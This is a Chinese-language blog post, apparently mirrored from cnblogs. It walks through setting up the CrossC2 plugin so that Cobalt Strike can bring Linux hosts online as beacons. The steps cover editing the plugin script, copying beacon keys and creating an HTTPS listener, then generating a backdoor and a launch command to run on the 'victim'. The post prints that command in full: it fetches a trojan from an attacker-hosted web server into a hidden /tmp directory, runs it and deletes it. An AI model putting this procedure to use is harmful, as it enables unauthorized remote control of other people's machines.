zoukankan      html  css  js  c++  java
  • cs配置linux上线

    1.下载CrossC2

    cs默认是不支持上线linux主机的 , 但是可以通过安装CrossC2插件实现

    因为一些原因,目前强制只支持HTTPS beacon。

    下载地址 : https://github.com/gloxec/CrossC2/releases/tag/v3.0.2

    image-20211121115548536

    然后解压zip压缩包 , 这里我放到cs安装目录的script目录下 , 推荐这个目录 , 这个目录就是放一些cs脚本的

    image-20211121120133321

    2.安装插件

    首先编辑cna文件

    vim CrossC2-GithubBot-2021-11-02.cna 
    
    # 修改CrossC2.cna脚本中CC2_PATH, CC2_BIN
    $CC2_PATH = "/xxx/xx/xx/"; # <-------- fix
    $CC2_BIN = "genCrossC2.Linux";
    

    image-20211121120628311

    复制cs服务端目录下的 .cobaltstrike.beacon_keys到genCrossC2.Linu在一个目录下

    cp .cobaltstrike.beacon_keys ./script
    

    image-20211121120948554

    启动cs , 使用客户端加载cna插件

    选择Script Manager,添加CrossC2.cna (如果成功安装,菜单栏会多出一项 CrossC2)

    image-20211121121256940

    image-20211121121236529

    3.上线测试

    3.1生成后门

    新建一个https的监听

    image-20211121121926981

    image-20211121121540855

    image-20211121130850580

    3.2生成上线命令

    image-20211121122102709

    image-20211121122201918

    image-20211121122216605

    3.3上线

    将上线命令复制到受害者上执行

    image-20211121125810845

    上线成功

    image-20211121125845468

    4.总结

    整个流程 : 先生成一个后门linux平台的后门文件

    image-20211121130245639

    然后再开启一个web服务 , 生成一系列命令

    image-20211121130313273

    具体命令

    mkdir /tmp/.xNbKN; rm -f /tmp/.xNbKN/update; curl -A O -L http://192.168.0.117:55413/xFhmSNydFZ -o /tmp/.xNbKN/update; chmod 755 /tmp/.xNbKN/update; /tmp/.xNbKN/update; sleep 10; rm -rf /tmp/.xNbKN/update
    
    # 创建一个目录 , 然后删除update , 下载木马文件 , 保存成update , 给权限 , 然后执行 , 睡10秒 , 删除update
    

    如果cs使用了profile文件 , 注意 是否符合CrossC2 如果不符合 , 则不能上线 , 目前我还没有测试

  • 相关阅读:
    C语言扩展题
    C语言第五题
    C语言第四题
    C语言第三题
    c语言第二题
    11
    游戏开发的一些想法
    openxml的视频教程
    JavaScript调试之console.log
    IPPatternConverter
  • 原文地址:https://www.cnblogs.com/xcymn/p/15721402.html
Copyright © 2011-2022 走看看